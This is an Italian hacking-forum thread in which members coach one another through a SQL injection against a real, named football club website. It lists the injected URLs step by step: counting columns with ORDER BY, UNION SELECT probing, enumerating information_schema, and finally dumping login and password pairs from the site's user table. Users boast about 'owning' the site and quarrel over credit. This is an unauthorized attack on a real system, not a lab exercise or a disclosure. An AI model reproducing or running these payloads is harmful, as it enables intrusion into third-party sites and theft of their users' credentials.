Follow along with the video below to see how to install our site as a web app on your home screen.
Nota: This feature may not be available in some browsers.
the massakretor ha detto:vir5 si sta scaldando xD in pratica sta cercando di dirti che dato che non sai come si chiamano, [size=xx-large]devi "buttarti" finchè non centri il nome giusto.[/size]
Se la tabella degli utenti non sai come si chiama, [size=xx-large]prova [/size]"users",altrimenti altri nomi, "info_users", [size=xx-large]finchè non trovi quello giusto^^[/size]
Luke34 ha detto:[size=xx-large]e loro come hanno capito che ra usr ?? -_-''[/size]
Malex ha detto:XD immaginavo fosse anti-lamer XD
cmq complimenti, hai riempito una pagina della sezione, appena posso ti piazzo un +1
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 6-- => no errore
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 7-- => errore
Domanda: sarà forse l'ultimo errore?
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 10000-- =>errore diverso da quello del 7
Risposta: no. Ancora:
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 8-- => ancora mezzo errore
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 9-- => ERRORE COMPLETO
Numero colonne: 8
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,2,3,4,5,6,7,8--
Estraiamo nome tabelle e colonne:
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,2,3,4,5,6,7,8 FROM information_schema.COLUMNS--
Numeri stringa da editare:
2 - 3
6 - 31-12-1899 - 00:00
7
2, 3, 6, 7.
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,table_name,column_name,4,5,6,7,8 FROM information_schema.COLUMNS--
questo lo posso sfruttare anche con altre sql injection ?D4nt3 ha detto:Malex ha detto:XD immaginavo fosse anti-lamer XD
cmq complimenti, hai riempito una pagina della sezione, appena posso ti piazzo un +1
Lo sto ancora aspettando bro XD Dante
Ciò che ti sto per far leggere, sono insegnamenti, E IO NON INSEGNO MAI. Quindi nn fare più domande a arrivaci da solo.
Codice:http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 6-- => no errore http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 7-- => errore Domanda: sarà forse l'ultimo errore? http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 10000-- =>errore diverso da quello del 7 Risposta: no. Ancora: http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 8-- => ancora mezzo errore http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 ORDER BY 9-- => ERRORE COMPLETO Numero colonne: 8 http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,2,3,4,5,6,7,8-- Estraiamo nome tabelle e colonne: http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,2,3,4,5,6,7,8 FROM information_schema.COLUMNS-- Numeri stringa da editare: 2 - 3 6 - 31-12-1899 - 00:00 7 2, 3, 6, 7. http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 UNION SELECT 1,table_name,column_name,4,5,6,7,8 FROM information_schema.COLUMNS--
Oltre nn vado. Mi dispiace, ma mi rifiuto. Se sai un MINIMO di SQL allora capisci cm andare avanti. Dante
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74%20union%20all%20select%201,concat%28login,char%2858%29,password%29,2,3,4,5,6,7%20from%20usr_users
bronsa ha detto:... perchè 2 url per user & pass??
questo dimostra che non conosci CONCAT... e che non conosci il sql
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 union all select 1,concat(login,char(58),password,2,3,4,5,6,7 from usr_users
http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 union all select 1,concat(login,0x3a,password),2,3,4,5,6,7 from usr_users
RedSkull ha detto:adesso unisci a quello che ti abbiamo detto a questo: www.evilsocket.net/papers/sqlinjections.pdf
LOOL ancora non ti sei reso conto che CHARACTER_SETS è il nome di una tabella...mi esce scritto
CHARACTER_SETS - 2
5 - 31-12-1899 - 00:00
6
qule sarebbe la tabella ?
invece per la colonna
CHARACTER_SET_NAME - 2
5 - 31-12-1899 - 00:00
6
Owned il pazzoLuke34 ha detto:bronsa ha detto:... perchè 2 url per user & pass??
questo dimostra che non conosci CONCAT... e che non conosci il sql
Codice:http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 union all select 1,concat(login,char(58),password,2,3,4,5,6,7 from usr_users
Codice:http://www.pisacalcio.it/stagione/tabellino.html?iId=-74 union all select 1,concat(login,0x3a,password),2,3,4,5,6,7 from usr_users
D4nt3 ha detto:Luke34.. Nasconditi. Che pazzo provi a dire OWNED? Questa SQL è stata fatta da 25 persone porca ***** e immagino che ora la spaccerai per tua dai, nn ti voglio qua, anche se il sito nn è mio, qua nn ce devi sta. Vattene. Vai su eurohackers.it. Dante
eurohackers? ma per piacere , una massa di ....D4nt3 ha detto:Luke34.. Nasconditi. Che pazzo provi a dire OWNED? Questa SQL è stata fatta da 25 persone porca ***** e immagino che ora la spaccerai per tua dai, nn ti voglio qua, anche se il sito nn è mio, qua nn ce devi sta. Vattene. Vai su eurohackers.it. Dante
MrDarkest ha detto:Abbassiamo i toni? Devo usare il warn?
Luke34 ha detto:eurohackers? ma per piacere , una massa di ....D4nt3 ha detto:Luke34.. Nasconditi. Che pazzo provi a dire OWNED? Questa SQL è stata fatta da 25 persone porca ***** e immagino che ora la spaccerai per tua dai, nn ti voglio qua, anche se il sito nn è mio, qua nn ce devi sta. Vattene. Vai su eurohackers.it. Dante
:-/